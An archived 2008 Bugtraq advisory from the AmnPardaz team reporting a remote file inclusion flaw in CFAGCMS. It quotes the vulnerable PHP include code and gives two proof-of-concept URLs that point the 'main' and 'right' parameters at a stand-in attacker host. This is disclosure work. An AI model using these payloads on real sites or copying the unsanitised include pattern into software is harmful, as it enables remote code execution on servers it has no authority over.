lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Date: Sun, 14 Dec 2008 10:34:13 +0330 From: admin@...report.ir To: bugtraq@...urityfocus.com Subject: CFAGCMS Remote File Inclusion ########################## www.BugReport.ir ######################### # # AmnPardaz Security Research Team # # Title: CFAGCMS Remote File Inclusion # Vendor: http://sourceforge.net/projects/cfagcms/ # Bug: Remote File Inclusion # Vulnerable Version: 1 # Exploitation: Remote with browser # Fix: N/A # Original Advisory: http://www.bugreport.ir/index_58.htm ################################################################### #################### - Description: #################### CFAGCMS is a gaming cms for gaming website like GameSpot, GameSpy and others. It's using php and mysql. #################### - Vulnerability: #################### +--> File Inclusion When register_globals is enabled, Its possible to include arbitrary files from local or remote resources. #################### - Code Snippet: #################### themes/default/index.php #line:14-17 <div id="twocols" class="clearfix"> <div id="maincol" >maincol<?php include($main);?></div> <div id="rightcol" >right col<?php include($right);?></div> </div> #################### - Exploits/POCs: #################### POC: http://[URL]/cfagcms/themes/default/index.php?main=http://evilsite POC: http://[URL]/cfagcms/themes/default/index.php?right=http://evilsite #################### - Credit : #################### AmnPardaz Security Research & Penetration Testing Group Contact: admin[4t}bugreport{d0t]ir www.BugReport.ir www.AmnPardaz.com
Powered by blists - more mailing lists